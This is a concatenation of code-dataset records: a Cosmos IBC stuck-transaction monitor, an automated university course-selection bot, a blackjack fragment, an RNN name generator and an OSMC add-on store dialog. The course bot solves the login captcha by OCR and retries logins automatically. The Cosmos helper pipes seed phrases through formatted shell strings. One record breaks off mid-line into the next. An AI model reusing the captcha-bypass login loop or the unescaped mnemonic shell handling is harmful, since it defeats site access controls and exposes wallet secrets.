query_balance_json[\"balances\"]:\n account_balance = query_balance_json[\"balances\"][0][\"amount\"]\n except Exception as e:\n self.log_it(self.binary_name, \"api not active\", e)\n return account_balance\n\n \"\"\"\n Description:\n This method checks to see if the api is responding on the api set at self.api_node on init of the class or override.\n \"\"\"\n\n def check_api_active(self):\n try:\n api_active = False\n check_api_status_request = requests.get(self.api_node + \"/node_info\")\n if check_api_status_request.status_code == 200:\n api_active = True\n except Exception as e:\n self.log_it(self.binary_name + \"api not active\" + str(e))\n return api_active\n\n \"\"\"\n Description:\n This method checks to see if the rpc is responding and insync with the rpc set at self.rpc_node on init of the class or override. \n \"\"\"\n\n def check_rpc_node_in_sync(self):\n try:\n rpc_active = False\n up_to_date = False\n check_status_request = requests.get(self.rpc_node + \"/status\")\n check_status_response = json.loads(check_status_request.text)\n if check_status_request.status_code == 200:\n rpc_active = True\n if not check_status_response[\"result\"][\"sync_info\"][\"catching_up\"]:\n up_to_date = True\n except Exception as e:\n self.log_it(self.binary_name + \"rpc not active\" + str(e))\n return rpc_active, up_to_date\n\n \"\"\"\n Description:\n This method loads an account from mnemonic locally using the CLI. It takes a moniker and mnemonic. It will delete and reload the account if one exists.\n arg1. moniker of the account you want to load, if you have loaded already use same moniker as you have already used.\n arg2. mnemonic of the account you want to load. \n \"\"\"\n\n def load_account_from_mnemonic(self, moniker, mnemonic):\n self.cli_command(\n \"\"\"{binary_name} keys delete {moniker} --keyring-backend test -y || echo \"not present\" \"\"\".format(\n binary_name=self.binary_name, rpc_node=self.rpc_node, moniker=moniker, mnemonic=mnemonic),\n self.go_bin_folder)\n load_mnemonic = self.cli_command(\n \"\"\"echo \"{mnemonic}\" | {binary_name} keys add {moniker} --keyring-backend test --recover\"\"\".format(\n binary_name=self.binary_name, rpc_node=self.rpc_node, moniker=moniker, mnemonic=mnemonic),\n self.go_bin_folder)\n address = load_mnemonic.split(\"address:\")[1].split(\"\\n\")[0].strip()\n return address\n\n \"\"\"\n Description:\n This command takes two loaded mnemonics a bank mnemonic and a destination mnemonic \n and will utilize the go cli to execute the transaction to fund the account.\n arg1. Account address of the bank\n arg2. Account address you want to fund\n arg3. Chain id of the chain you are funding on\n arg4. the ammount you want to fund.\n arg5. The gas price you want to pay for the tx.\n \"\"\"\n\n def send_from_bank(self, from_account, to_account, chain_id, ammount, gas_price):\n send_money_transaction = self.cli_command(\n \"\"\"{binary_name} tx bank send {from_account} {to_account} {ammount} -y --node {rpc_node} --gas-prices {gas_price} --keyring-backend test --chain-id {chain_id}\"\"\".format(\n binary_name=self.binary_name,\n rpc_node=self.rpc_node,\n from_account=from_account,\n to_account=to_account,\n ammount=ammount,\n gas_price=gas_price,\n chain_id=chain_id), self.go_bin_folder)\n return send_money_transaction\n\n \"\"\"\n Description:\n This method will get the IBC connections of the rpc node specified using the binary specified during init.\n \"\"\"\n\n def retrieve_ibc_connections(self):\n page = 1\n connections = []\n while True:\n client_query = json.loads(self.cli_command(\n \"{binary_name} query ibc connection connections --node {rpc_node} --output json\".format(\n binary_name=self.binary_name,\n rpc_node=self.rpc_node),\n self.go_bin_folder))\n connections.extend(client_query['connections'])\n if not client_query['pagination']['next_key']:\n break\n page += 1\n return connections\n\n \"\"\"\n Description:\n This method will get the IBC channels of the rpc node specified using the binary specified during init.\n \"\"\"\n\n def retrieve_ibc_channels(self):\n page = 1\n channels = []\n while True:\n client_query = json.loads(self.cli_command(\n \"{binary_name} query ibc channel channels --node {rpc_node} --output json\".format(\n binary_name=self.binary_name,\n rpc_node=self.rpc_node),\n self.go_bin_folder))\n channels.extend(client_query['channels'])\n if not client_query['pagination']['next_key']:\n break\n page += 1\n return channels\n\n \"\"\"\n Description:\n This method will get the IBC Client States of the rpc node specified using the binary specified during init.\n \"\"\"\n\n def retrieve_ibc_client_states(self):\n page = 1\n clients = []\n while True:\n client_query = json.loads(self.cli_command(\n \"{binary_name} query ibc client states --node {rpc_node} --output json\".format(\n binary_name=self.binary_name,\n rpc_node=self.rpc_node),\n self.go_bin_folder))\n clients.extend(client_query['client_states'])\n if not client_query['pagination']['next_key']:\n break\n page += 1\n return clients\n\n \"\"\"\n Description:\n This method will get the current block height with the self.rpc_node.\n \"\"\"\n\n def get_current_block_height(self):\n try:\n current_height_request = requests.get(self.rpc_node + \"/status\").json()[\"result\"][\"sync_info\"][\n \"latest_block_height\"]\n return current_height_request\n except Exception as e:\n self.log_it(\"RPC Is having issues did not return a json response for status\" + e)\n\n \"\"\"\n Description:\n This method will parse a tx returned as json from the cli to pull out the values needed for tracing IBC connections.\n arg1: the tx has you want to parse out the data for.\n \"\"\"\n\n def parse_transaction(self, transaction):\n txhash = transaction[\"hash\"]\n height = transaction[\"height\"]\n gas_wanted = transaction[\"tx_result\"][\"gas_wanted\"]\n gas_used = transaction[\"tx_result\"][\"gas_used\"]\n found_transaction = False\n logs = json.loads(transaction[\"tx_result\"][\"log\"])\n found_transaction_dict = {}\n for log in logs:\n if not found_transaction:\n for event in log[\"events\"]:\n if \"type\" in event:\n type = event[\"type\"]\n if \"attributes\" in event:\n for attribute in event[\"attributes\"]:\n if attribute[\"key\"] == \"packet_data\":\n packet_data = json.loads(attribute[\"value\"])\n if \"denom\" in packet_data:\n found_transaction = True\n if attribute[\"key\"] == \"packet_sequence\" and found_transaction:\n packet_id = attribute[\"value\"]\n if attribute[\"key\"] == \"packet_src_channel\" and found_transaction:\n packet_src_channel = attribute[\"value\"]\n if attribute[\"key\"] == \"packet_dst_channel\" and found_transaction:\n packet_dst_channel = attribute[\"value\"]\n if attribute[\"key\"] == \"packet_connection\" and found_transaction:\n packet_connection = attribute[\"value\"]\n amount = float(packet_data[\"amount\"])\n denom = packet_data[\"denom\"]\n receiver = packet_data[\"receiver\"]\n sender = packet_data[\"sender\"]\n found_transaction_dict = {\"packet_sequence\": packet_id,\n \"packet_source_channel\": packet_src_channel,\n \"packet_dst_channel\": packet_dst_channel,\n \"packet_connection\": packet_connection,\n \"txhash\": txhash,\n \"type\": type,\n \"height\": height,\n \"gas_wanted\": gas_wanted,\n \"gas_used\": gas_used,\n \"amount\": amount,\n \"denom\": denom,\n \"receiver\": receiver,\n \"sender\": sender\n }\n return found_transaction_dict\n\n \"\"\"\n Description:\n This method will utilize the CLI to get the IBC packet commitments for the channel specified. Tried this with the API first but it was inconsistent at returning commitments.\n arg1: the channel you want to check commitments on\n arg2. the binary you want to use to check commitments\n arg3. the rpc node you want to use to check commitments.\n \"\"\"\n\n def get_packet_commitments_with_cli(self, channel, binary_name, rpc_node):\n page = 1\n commitments = []\n while True:\n try:\n client_query = json.loads(self.cli_command(\n \"{binary_name} q ibc channel packet-commitments transfer {from_channel} --node {rpc_node} --output json --page {page}\".format(\n binary_name=binary_name, rpc_node=rpc_node, from_channel=channel, page=page),\n self.go_bin_folder))\n commitments.extend(client_query['commitments'])\n if not client_query['pagination']['next_key']:\n break\n page += 1\n except Exception as e:\n self.log_it(str(e))\n return commitments\n return commitments\n\n \"\"\"\n Description:\n This method will utilize the CLI to get the IBC packet unreceived transactions for the channel specified. Tried this with the API first but it was inconsistent at returning unreceived transactions.\n arg1: the channel you want to check unreceived transactions on\n arg2. the binary you want to use to check unreceived transactions\n arg3. the rpc node you want to use to check unreceived transactions.\n arg4. string seperated list of packet sequence commitments.\n \"\"\"\n\n def get_packet_unreceived_with_cli_and_return_stuck_transactions(self, channel, binary_name, rpc_node,\n commitment_sequences):\n try:\n stuck_transactions = json.loads(self.cli_command(\n '{binary_name} q ibc channel unreceived-packets transfer {from_channel} --sequences=\"{sequences}\" --node {rpc_node} --output json '.format(\n binary_name=binary_name, rpc_node=rpc_node, from_channel=channel, sequences=commitment_sequences),\n self.go_bin_folder))\n except Exception as e:\n self.log_it(str(e))\n stuck_transactions = []\n\n return stuck_transactions\n\n \"\"\"\n Description:\n This method will utilze the rpc node specified at self.rpc_node to do a recursive event query on the\n event query passed as an argument and retrieve all data for all envs.\n arg 1. the event query you want to run.\n \"\"\"\n\n def recursive_rpc_event_query(self, event_query):\n packets_list = []\n page = 1\n while True:\n connection_url = '{rpc_url}/tx_search?query=\"{event_query}\"&page={page}'.format(rpc_url=self.rpc_node,\n event_query=event_query,\n page=page)\n try:\n request = requests.get(connection_url)\n except Exception as e:\n self.log_it(str(e))\n return packets_list\n\n if request.status_code == 200 or request.status_code == 201:\n request_data_object = request.json()\n if \"result\" in request_data_object:\n pages_total = int(request_data_object[\"result\"][\"total_count\"]) / 30 + 1\n pages_total = str(int(round(pages_total, 0)))\n if page > int(pages_total):\n break\n self.log_it(\"Building packet list: current page: {current_page} of {pages} total pages.\".format(\n current_page=page, pages=pages_total))\n packets_list += request_data_object[\"result\"][\"txs\"]\n page += 1\n else:\n self.log_it(request.status_code)\n self.log_it(request.content)\n break\n else:\n self.log_it(request.status_code)\n self.log_it(request.content)\n break\n self.log_it(\"Return Packet Lists\" + str(packets_list))\n return packets_list\n\n \"\"\"\n Description:\n This method will build the proper data object to parse for sent packets and their tx hash data.\n arg 1. build data object for sent packets.\n \"\"\"\n\n def build_sent_packets_data_structure(self, sent_packets):\n parsed_transactions = []\n for tx in sent_packets:\n parsed_transactions.append(self.parse_transaction(tx))\n return parsed_transactions\n\n \"\"\"\n Description:\n This method takes a list of packet commitment sequences and builds a comma seperated string.\n arg 1. list of packet commitment sequences.\n \"\"\"\n\n def build_string_comma_list_of_sequences_from_object(self, commitments):\n sequences = \"\"\n for commit in commitments:\n sequences = sequences + commit[\"sequence\"] + \",\"\n sequences = sequences[:-1]\n return sequences\n\n \"\"\"\n Description:\n This method parses the sent transactions and matches the sequences to see if the import is stuck.\n arg 1. stucket import packets, list of sent transactions with data.\n \"\"\"\n\n def parse_sent_transactions_and_match_stuck_packet_sequences(self, import_stuck_packets, parsed_transactions):\n stuck_import_transactions = []\n for packet in import_stuck_packets[\"sequences\"]:\n for sequence in parsed_transactions:\n if packet == sequence[\"packet_sequence\"]:\n packet_data = sequence\n stuck_import_transactions.append(packet_data)\n break\n return stuck_import_transactions\n\n \"\"\"\n Description:\n This method looks for and parses a data object for stuck transactions.\n arg 1. destination rpc node you want to look at.\n arg 2. source rpc node you want to use\n arg 3. destination channel of your IBC queue\n arg 4. destination connection of your IBC queue\n arg 5. source channel of your IBC queue\n arg 6. source connection of your IBC queue\n arg 7. binary name you want to run queries with\n \"\"\"\n\n def look_for_stuck_transactions(self, external_node_rpc, import_node_rpc, destination_channel,\n destination_connection, source_channel, source_connection, binary_name):\n # This is to make it more dynamic because I want to loop over a list of these values so I set it in the class as a whole for each call so it will overwrite always the init.\n\n self.destination_channel = destination_channel\n self.destination_connection = destination_connection\n self.source_channel = source_channel\n self.source_connection = source_connection\n self.binary_name = binary_name\n self.rpc_node = import_node_rpc\n stuck_import_transactions = {}\n stuck_export_transactions = {}\n commitments = self.get_packet_commitments_with_cli(self.destination_channel, self.binary_name, import_node_rpc)\n sequences = self.build_string_comma_list_of_sequences_from_object(commitments)\n if sequences:\n export_stuck_packets = self.get_packet_unreceived_with_cli_and_return_stuck_transactions(\n self.source_channel,\n self.binary_name,\n external_node_rpc,\n sequences)\n\n self.rpc_node = import_node_rpc\n sent_packets = self.recursive_rpc_event_query(\n \"send_packet.packet_connection=\\'{connection}\\'\".format(connection=self.source_connection))\n send_transactions_data_object = self.build_sent_packets_data_structure(sent_packets)\n stuck_export_transactions = self.parse_sent_transactions_and_match_stuck_packet_sequences(\n export_stuck_packets,\n send_transactions_data_object)\n\n commitments = self.get_packet_commitments_with_cli(self.source_channel, self.binary_name, external_node_rpc)\n sequences = self.build_string_comma_list_of_sequences_from_object(commitments)\n if sequences:\n import_stuck_packets = self.get_packet_unreceived_with_cli_and_return_stuck_transactions(\n self.destination_channel, self.binary_name, import_node_rpc, sequences)\n\n self.rpc_node = external_node_rpc\n sent_packets = self.recursive_rpc_event_query(\n \"send_packet.packet_connection=\\'{connection}\\'\".format(connection=self.destination_connection))\n send_transactions_data_object = self.build_sent_packets_data_structure(sent_packets)\n stuck_import_transactions = self.parse_sent_transactions_and_match_stuck_packet_sequences(\n import_stuck_packets,\n send_transactions_data_object)\n\n return stuck_import_transactions, stuck_export_transactions\n\n \"\"\"\n Description:\n This method takes the list of stuck transactions, and chain info and the type IMPORT or EXPORT and pushes a log into datadog from\n the list of parsed transactions.\n arg 1. list of json dictionary's representing the stuck transactions.\n arg 2. Information about the chains ex. \"source_chain_id/destination_chain_id\"\n arg 3. tx type you are logging for i.e. EXPORT or IMPORT\n \"\"\"\n\n def send_datadog_log(self, stuck_txs, chains, type_tx):\n configuration = Configuration()\n for stuck_tx in stuck_txs:\n dd_tags = 'cluster_name:chainops,env:betanet,tx_type:{tx_type},chains:{chains}'.format(tx_type=type_tx,\n chains=chains)\n message = {\"packet_sequence\": str(stuck_tx[\"packet_sequence\"]),\n \"packet_source_channel\": str(stuck_tx[\"packet_source_channel\"]),\n \"packet_dst_channel\": str(stuck_tx[\"packet_dst_channel\"]),\n \"packet_connection\": str(stuck_tx[\"packet_connection\"]),\n \"txhash\": str(stuck_tx[\"txhash\"]),\n \"height\": str(stuck_tx[\"height\"]),\n \"gas_wanted\": str(stuck_tx[\"gas_wanted\"]),\n \"gas_used\": str(stuck_tx[\"gas_used\"]),\n \"amount\": str(stuck_tx[\"amount\"]),\n \"denom\": str(stuck_tx[\"denom\"]),\n \"reciever\": str(stuck_tx[\"receiver\"]),\n \"sender\": str(stuck_tx[\"sender\"]),\n \"chains\": chains,\n \"type_tx\": type_tx}\n message = json.dumps(message)\n\n with ApiClient(configuration) as api_client:\n api_instance = logs_api.LogsApi(api_client)\n body = HTTPLog([\n HTTPLogItem(\n ddsource=\"ibc-stuck-transactions\",\n ddtags=dd_tags,\n service=\"ibc-stuck-transactions\",\n hostname=chains,\n message=message\n ),\n ])\n try:\n api_response = api_instance.submit_log(body)\n self.log_it(api_response)\n except ApiException as e:\n self.log_it(\"Exception when calling LogsApi->submit_log: %s\\n\" % e)\n","repo_name":"Sifchain/sifchain-validators","sub_path":"scripts/ibc-tools/examples/lib/CosmosIBC.py","file_name":"CosmosIBC.py","file_ext":"py","file_size_in_byte":26130,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"} +{"seq_id":"34682150124","text":"# Automated Cource Selection (ACS)\n# Created by Cheng Xinlun @Tsinghua University, 2015/09/18\n# First draft finished debugging @Tsinghua University, 2015/09/20\n# Major improvement @Tsinghua Univerity, 2017/05/15\n\n# Dependencies\n# 1. Python 3\n# 2. requests, Pillow\n# 3. scikit-image (skimage)\n\n\n# Import necessary modules\nimport requests\nimport urls\nimport ipro\nimport headers\n\n\n# Self-defined class for exception\nclass XKException(Exception):\n pass\n\n\n# Class for class selection\nclass XuanKe():\n def __init__(self, sem, cc, cn, cs, user, pswd):\n # Variable initialization\n self.semester = sem\n self.class_class = cc\n self.class_number = cn\n self.class_subnumber = cs\n self.user = user\n self.pswd = pswd\n self.gettoken_data = {\"m\": self.class_class + \"Search\",\n \"p_xnxq\": self.semester,\n \"tokenPriFlag\": self.class_class, \"is_zyrxk\": \"1\"}\n self.login_webaddr = urls.urlCook\n self.validator = urls.urlVali\n self.captcha_addr = urls.urlCapt\n self.login_postaddr = urls.urlLogi\n self.xkaddr = urls.urlCous\n # Generic header\n self.gheader = headers.headGene\n # Login header construction\n self.lheader = headers.headGene\n self.lheader.update(headers.headAcce)\n self.lheader.update(headers.headCook)\n\n # Login and get captcha\n def login(self):\n while True:\n s = requests.Session()\n responce = s.get(self.login_webaddr, headers=self.gheader)\n if responce.url != self.login_webaddr:\n s.close()\n continue\n get_check = s.get(self.validator, headers=self.gheader)\n if get_check.url != self.validator:\n s.close()\n continue\n captcha_responce = s.get(self.captcha_addr, headers=self.gheader)\n if captcha_responce.url != self.captcha_addr:\n s.close()\n continue\n # Get and save captcha into file named with the picture md5\n output_captcha = open(\"temp.jpg\", \"bw\")\n output_captcha.write(captcha_responce.content)\n output_captcha.close()\n # Captcha\n captcha = ipro.iip(\"temp.jpg\")\n print(captcha)\n # Login post data construct\n self.login_data = {\"j_username\": self.user,\n \"j_password\": self.pswd,\n \"captchaflag\": \"login1\",\n \"_login_image_\": captcha}\n login_res = s.post(self.login_postaddr, self.login_data,\n headers=self.lheader, verify=False)\n if login_res.url != urls.urlCous + \"?m=main\":\n s.close()\n continue\n break\n return s\n\n # Get token for the first time from returned webpage\n def gettoken(self, s):\n gettoken_res = s.post(self.xkaddr, self.gettoken_data,\n headers=self.gheader)\n if gettoken_res.url != self.xkaddr:\n s.close()\n raise XKException(\"Kicked offline. Relogining...\")\n token = gettoken_res.text.split(\n \" 21 and have_ace:\n score -= 10 # lower ace value\n have_ace = False # only do this once\n return score\n\ndef display_hand(hand):\n score = score_hand(hand)\n print('Your hand: ' + str(hand) + ' (' + str(score) + ')')\n\ndef play_game():\n deck = Deck()\n deck.shuffle()\n hand = []\n deck.deal(2, hand)\n while True:\n display_hand(hand)\n action = input('t-twist or s-stick: ')\n if action == 't':\n deck.deal(1, hand)\n elif action == 's':\n print('Sticking')\n break\n \nplay_game()","repo_name":"simonmonk/coding_book","sub_path":"python/06_card_game/blackjack_2.py","file_name":"blackjack_2.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"73138980679","text":"import os\nimport types\nimport json\nimport random\n\nfrom util import *\nfrom rnn import *\n\ncuda = False\nnum_processes = 12\n\n\nclass Country:\n def __init__(self, path):\n self.path = path\n self.datasets = {\n \"female\": os.path.join(path, \"female.txt\"),\n \"male\": os.path.join(path, \"male.txt\"),\n \"surname\": os.path.join(path, \"surname.txt\"),\n }\n\n # initialise the pre and post proccess function lists\n self.pre_process = []\n self.post_process = []\n\n # load the data file\n self.load_data()\n\n # load the alphabet file\n self.alphabet = self.load_alphabet()\n\n # initialise the rnn models\n hidden_size = 128\n self.rnn = {}\n\n for dataset in self.datasets:\n self.rnn[dataset] = RNN(\n len(self.alphabet), hidden_size, len(self.alphabet))\n\n \"\"\" Load the alphabet from the alphabet file\n Returns:\n alphabet: (str[]) the list of the letters/characters to use while training\n \"\"\"\n\n def load_alphabet(self):\n alphabet_path = os.path.join(self.path, \"alphabet.txt\")\n\n # check if the alphabet file exists, if not, raise an exception\n if os.path.exists(alphabet_path):\n with open(alphabet_path, \"r\") as alphabet_file:\n # Split the file by lines: on letter/character should be on each line\n letters = alphabet_file.read().split(\"\\n\")\n return letters\n else:\n raise Exception(\n f\"The alphabet file {alphabet_path} could not be found\")\n return []\n\n \"\"\" load the data from the data file\n \"\"\"\n\n def load_data(self):\n data_path = os.path.join(self.path, \"data.json\")\n if os.path.exists(data_path):\n with open(data_path, \"r\") as data_file:\n j = json.loads(data_file.read())\n\n # match the imported global function with the ones listed in the json file\n for pre in j[\"pre\"]:\n if pre in globals():\n func = globals()[pre]\n\n # check if the requested object is a function\n if type(func) is types.FunctionType:\n self.pre_process.append(func)\n else:\n raise Exception(\n f\"The function '{pre}' is not a function\")\n else:\n # If the function was not loaded, throw an exception\n raise Exception(\n f\"The function '{pre}' was not loaded or does not exist\")\n\n for post in j[\"post\"]:\n if post in globals():\n func = globals()[post]\n\n # check if the requested object is a function\n if type(func) is types.FunctionType:\n self.post_process.append(func)\n else:\n raise Exception(\n f\"The function '{post}' is not a function\")\n else:\n # If the function was not loaded, throw an exception\n raise Exception(\n f\"The function '{post}' was not loaded or does not exist\")\n\n else:\n # load the default pre and post processing functions\n self.pre_process = [uncapitalise]\n self.post_process = [deserialise, capitalise]\n\n \"\"\" List all the names from a given category file\n Args:\n category: (str) the category to select names from\n Returns:\n data: (str[]) an array containing all of the names from the given category file\n \"\"\"\n\n def get_names(self, category):\n with open(self.datasets[category], \"r\") as datafile:\n return [name for name in datafile.read().split(\"\\n\")]\n\n \"\"\" List all names in all categories\n Returns:\n data: (str[]) an array with all of the names in this country's datasets\n \"\"\"\n\n def get_all(self):\n return [name for k in self.datasets for name in self.get_names(k)]\n\n \"\"\" Pre-process a name for training\n Args:\n name: the name loaded from the dataset\n Returns:\n name: the name after being processed\n \"\"\"\n\n def postprocess(self, name):\n for f in self.post_process:\n name = f(name)\n return name\n\n \"\"\" Post-process a name after sampling\n Args:\n name: the name output from the recurrent neural network\n Returns:\n name: the name after being processed\n \"\"\"\n\n def preprocess(self, name):\n for f in self.pre_process:\n name = f(name)\n return name\n\n \"\"\" Train a neural network on the given dataset\n Args:\n category: (str) the category to sample training names from\n \"\"\"\n\n def train(self, category):\n # select the RNN model to be training on\n rnn = self.rnn[category]\n\n # load names from that dataset and pre proccess them\n print(\"preprocessing names...\")\n names = [self.preprocess(name) for name in self.get_names(category)]\n print(f\"processed {len(names)} names!\")\n\n # calculate optimum number of iterations (using 80% of whole dataset)\n iters = int(len(names) * 0.8)\n\n # start training\n learn_names(rnn, names, self.alphabet, iterations=iters,\n num_processes=num_processes)\n\n \"\"\" Sample a name from the neural network with a given starting letter\n Args:\n category: (str) the category to sample generated names from\n Returns:\n name: the output from the neural network\n \"\"\"\n\n def sample(self, category, start_letter):\n\n # select the RNN model to be sampling from\n rnn = self.rnn[category]\n\n # set the random factor of the RNN to randomise names that are generated\n rnn.random_factor = 0.7\n\n # call the rnn sample function to generate a single name\n name = sample(rnn, self.alphabet, start_letter)\n\n # post process the name and return\n return self.postprocess(name)\n\n \"\"\" Load the rnn from its file\n Args:\n category: (str) the category to load\n parent_directory: (str) where to find the model\n \"\"\"\n\n def load_rnn(self, category, parent_directory):\n model_file = os.path.join(parent_directory, f\"{category}.pt\")\n self.rnn[category] = torch.load(model_file)\n\n \"\"\" Save the rnn of a given category to its file\n Args:\n category: (str) the category to save\n parent_directory: (str) the directory to save the model file to \n \"\"\"\n\n def save_rnn(self, category, parent_directory):\n rnn = self.rnn[category]\n model_file = os.path.join(parent_directory, f\"{category}.pt\")\n torch.save(rnn, model_file)\n\n\ndef get_countries():\n return {\n country: Country(os.path.join(countries_path, country)) for country in os.listdir(countries_path) if os.path.isdir(os.path.join(countries_path, country))\n }\n\n\n\"\"\" train all of the datasets from a specific country\n Args:\n country: (Country) \n\"\"\"\n\n\ndef train_country(country, name):\n datasets = country.datasets\n for dataset in datasets:\n print(f\"Training {dataset} in {name}\")\n country.train(dataset)\n\n print(f\"Finished training on {dataset}... saving...\", end=\"\")\n path = os.path.join(\"data\", \"models\", name)\n\n # check if the path already exists before trying to make directories\n if not os.path.exists(path):\n os.makedirs(path)\n\n country.save_rnn(dataset, path)\n print(\"saved!\")\n\n\ndef sample_country(country, country_name, number_of_samples=10000):\n\n datasets = country.datasets\n for dataset in datasets:\n\n # ensure that the model exists before sampling\n path = os.path.join(\"data\", \"models\", country_name)\n if os.path.exists(os.path.join(path, dataset + \".pt\")):\n\n # load the country's rnn\n country.load_rnn(dataset, path)\n\n # load the names from the country's dataset, and pre-process them\n names = [country.preprocess(name)\n for name in country.get_names(dataset)]\n\n # make a dictionary full of start letters and their frequency\n start_letters = {}\n\n for name in names:\n if len(name) > 0:\n start_letter = name[0]\n\n # if the start letter isn't already in the dictionary, add it with value 1\n if start_letter in start_letters:\n start_letters[start_letter] += 1\n else:\n start_letters[start_letter] = 1\n\n # turn each integer count into a float where: letter_weight=frequency/total_names\n total = len(names)\n\n for letter in start_letters:\n weight = float(start_letters[letter] / total)\n start_letters[letter] = weight\n\n # sample names from the RNN\n sampled_names = []\n\n for i in range(number_of_samples):\n try:\n letter = weighted_choice(start_letters)\n sample = country.sample(dataset, letter)\n sampled_names.append(sample)\n except:\n pass\n\n # remove duplicate names\n sampled_names = list(dict.fromkeys(sampled_names))\n\n # create a sqlite connection\n connection = sqlite3.connect(database)\n\n # always close the connection when finished\n with connection:\n cursor = connection.cursor()\n for name in sampled_names:\n sql = \"INSERT INTO names(Name, Origin, Category) VALUES(?, ?, ?)\"\n\n # insert the current name and options into the database\n cursor.execute(sql, (name, country_name, dataset))\n\n # commit changes and save the database\n connection.commit()\n\n print(\n f\"Saved {len(sampled_names)} names for {country_name}/{dataset}\")\n\n else:\n print(f\"the model: {country_name}/{dataset} was not found.\")\n\n\ncountries_path = \"data/datasets\"\ndatabase = os.path.join(\"data\", \"names.db\")\nif __name__ == \"__main__\":\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n # allow processes on this model to share memory\n torch.multiprocessing.set_start_method('spawn')\n\n # List all the directories containing country datasets to populate the countries dictionary\n countries = get_countries()\n\n country_count = len(countries)\n # Display debug information\n print(f\"Loaded {country_count} countries!\")\n\n # list all countries in neat collumns\n collumns = 4\n width = 14\n i = 0\n for country in countries:\n i += 1\n\n # print the country and then its index\n print(country, end=\"\")\n\n # organise into rows and collumns\n if i % collumns == 0:\n print(\"\")\n else:\n # separate collumns with spaces\n print(\" \" * (width - len(country)), end=\"\")\n\n # keep asking until the country selection is valid\n good_selection = False\n while not good_selection:\n # prompt user to select a country to train, or train all\n country_selection = input(\n \"select the name of a country to train on, or (all) to train on all countries: \")\n\n good_selection = True\n selected_countries = []\n\n # if the user selected all, then add all countries to list, if not, add the selected country\n if country_selection.lower() == \"all\":\n [selected_countries.append(country) for country in countries]\n elif country_selection.lower() in countries:\n selected_countries.append(country_selection)\n else:\n print(\"Country not found, try again\")\n good_selection = False\n\n choice = input(\"(t)rain on data, or (s)ample from weights?\")\n\n if choice.lower()[0] == \"t\":\n for country in selected_countries:\n train_country(countries[country], country)\n\n elif choice.lower()[0] == \"s\":\n create_table(database)\n for country in selected_countries:\n sample_country(countries[country], country)\n","repo_name":"davidovski/name-generator","sub_path":"src/neuralnetwork/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":12758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22473848831","text":"import json\nimport os\nimport socket\nfrom contextlib import closing\n\nimport xbmcaddon\nimport xbmcgui\nfrom osmccommon.osmc_language import LangRetriever\nfrom osmccommon.osmc_logging import StandardLogger\nfrom osmccommon.osmc_logging import clog\n\nADDON_ID = \"script.module.osmcsetting.apfstore\"\n\nlog = StandardLogger(ADDON_ID, os.path.basename(__file__)).log\n\n\nclass APFGui(xbmcgui.WindowXMLDialog):\n\n def __init__(self, strXMLname, strFallbackPath, strDefaultName, apf_dict, addon=None):\n super(APFGui, self).__init__(xmlFilename=strXMLname,\n scriptPath=strFallbackPath,\n defaultSkin=strDefaultName)\n self.apf_dict = apf_dict\n\n self._addon = addon\n self._lang = None\n self._path = ''\n\n self.list_control = None\n self.addon_gui = None\n\n self.apf_order_list = []\n\n self.action_dict = {}\n\n def onInit(self):\n\n self.list_control = self.getControl(500)\n self.list_control.setVisible(True)\n\n for key, value in self.apf_dict.items():\n self.list_control.addItem(value)\n self.apf_order_list.append(key)\n\n try:\n self.getControl(50).setVisible(False)\n except:\n pass\n\n self.check_action_dict()\n\n @property\n def addon(self):\n if not self._addon:\n self._addon = xbmcaddon.Addon(ADDON_ID)\n return self._addon\n\n def lang(self, value):\n if not self._lang:\n retriever = LangRetriever(self.addon)\n self._lang = retriever.lang\n return self._lang(value)\n\n @property\n def path(self):\n if not self._path:\n self._path = self.addon.getAddonInfo('path')\n return self._path\n\n @clog(logger=log)\n def check_action_dict(self):\n\n install = 0\n removal = 0\n\n for _, value in self.action_dict.items():\n if value == 'Install':\n install += 1\n\n elif value == 'Uninstall':\n removal += 1\n\n if not install and not removal:\n self.getControl(6).setVisible(False)\n self.getControl(61).setVisible(False)\n self.getControl(62).setVisible(False)\n return\n\n if install:\n self.getControl(61).setLabel(self.lang(32001) % install)\n self.getControl(6).setVisible(True)\n self.getControl(61).setVisible(True)\n\n else:\n self.getControl(61).setVisible(False)\n\n if removal:\n self.getControl(62).setLabel(self.lang(32002) % removal)\n self.getControl(6).setVisible(True)\n self.getControl(62).setVisible(True)\n\n else:\n self.getControl(62).setVisible(False)\n\n @clog(logger=log)\n def onClick(self, controlID):\n\n if controlID == 500:\n container = self.getControl(500)\n\n sel_pos = container.getSelectedPosition()\n sel_item = self.apf_dict[self.apf_order_list[sel_pos]]\n\n xml = \"APFAddonInfo_720OSMC.xml\" \\\n if xbmcgui.Window(10000).getProperty(\"SkinHeight\") == '720' \\\n else \"APFAddonInfo_OSMC.xml\"\n\n self.addon_gui = AddonInfoGui(xml, self.path, 'Default',\n sel_item=sel_item, addon=self.addon)\n self.addon_gui.doModal()\n\n ending_action = self.addon_gui.action\n\n if ending_action == 'Install':\n self.action_dict[sel_item.id] = 'Install'\n\n elif ending_action == 'Uninstall':\n self.action_dict[sel_item.id] = 'Uninstall'\n\n elif sel_item.id in self.action_dict:\n del self.action_dict[sel_item.id]\n\n self.check_action_dict()\n del self.addon_gui\n log(self.action_dict)\n\n elif controlID == 7:\n self.close()\n\n elif controlID == 6:\n # send install and removal list to Update Service\n action_list = [\n 'install_' + k\n if v == 'Install'\n else 'removal_' + k\n for k, v in self.action_dict.items()\n ]\n action_string = '|=|'.join(action_list)\n\n self.contact_update_service(action_string)\n self.close()\n\n @clog(logger=log)\n def contact_update_service(self, action_string):\n message = ('action_list', {\n 'action': action_string\n })\n\n message = json.dumps(message)\n\n with closing(socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)) as open_socket:\n open_socket.connect('/var/tmp/osmc.settings.update.sockfile')\n if not isinstance(message, (bytes, bytearray)):\n message = message.encode('utf-8', 'ignore')\n open_socket.sendall(message)\n\n\nclass AddonInfoGui(xbmcgui.WindowXMLDialog):\n \"\"\"\n Controls\n ==============================\n 50001\tShortdesc\n 50002\tLongdesc\n 50003\tVersion\n 50004\tMaintainer\n 50005\tLastUpdated\n 50006\tIcon\n 50007\tName\n \"\"\"\n\n def __init__(self, strXMLname, strFallbackPath, strDefaultName, 